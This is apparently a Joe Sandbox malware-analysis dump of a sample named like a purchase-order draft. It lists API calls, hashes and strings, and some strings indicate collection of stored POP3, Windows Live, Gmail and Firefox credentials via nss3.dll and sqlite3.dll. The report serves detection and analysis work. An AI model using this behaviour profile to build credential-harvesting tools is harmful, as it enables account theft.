                                                                                • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                  • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                  • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                • String ID:
                                                                                • API String ID: 2432066023-0
                                                                                • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                APIs
                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                • memset.MSVCRT ref: 0040FA1E
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                • API String ID: 945165440-3589380929
                                                                                • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                APIs
                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                  • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                • strlen.MSVCRT ref: 00403778
                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                • String ID: %s@gmail.com
                                                                                • API String ID: 3261640601-4097000612
                                                                                • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004094C8
                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                • memset.MSVCRT ref: 0040950C
                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                • String ID: sysdatetimepick32
                                                                                • API String ID: 3411445237-4169760276
                                                                                • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Item$DialogMessageSend
                                                                                • String ID:
                                                                                • API String ID: 2485852401-0
                                                                                • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                APIs
                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                • String ID:
                                                                                • API String ID: 3642520215-0
                                                                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                • memset.MSVCRT ref: 00405C3B
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                • String ID:
                                                                                • API String ID: 2313361498-0
                                                                                • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                • String ID:
                                                                                • API String ID: 2126104762-0
                                                                                • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                • String ID:
                                                                                • API String ID: 1999381814-0
                                                                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                • API String ID: 1297977491-3883738016
                                                                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                APIs
                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: gj
                                                                                • API String ID: 438689982-4203073231
                                                                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm$__aullrem
                                                                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                • API String ID: 643879872-978417875
                                                                                • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DAE3
                                                                                • memset.MSVCRT ref: 0040DAF7
                                                                                • memset.MSVCRT ref: 0040DB0B
                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                • String ID: user_pref("
                                                                                • API String ID: 765841271-2487180061
                                                                                • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                • memset.MSVCRT ref: 004058C3
                                                                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                • SetFocus.USER32(?), ref: 00405976
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                • String ID:
                                                                                • API String ID: 4281309102-0
                                                                                • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                APIs
                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75920A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75920A60), ref: 00406D4D
                                                                                • _mbscat.MSVCRT ref: 0040A8FF
                                                                                • sprintf.MSVCRT ref: 0040A921
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite_mbscatsprintfstrlen
                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                • API String ID: 1631269929-4153097237
                                                                                • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040810E
                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,7508EB20,?), ref: 004081B9
                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                • API String ID: 524865279-2190619648
                                                                                • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00406B8E
                                                                                • strlen.MSVCRT ref: 00406B99
                                                                                • strlen.MSVCRT ref: 00406BFF
                                                                                • strlen.MSVCRT ref: 00406C0D
                                                                                • strlen.MSVCRT ref: 00406BA7
                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                Strings
                                                                                Memory Dump Source
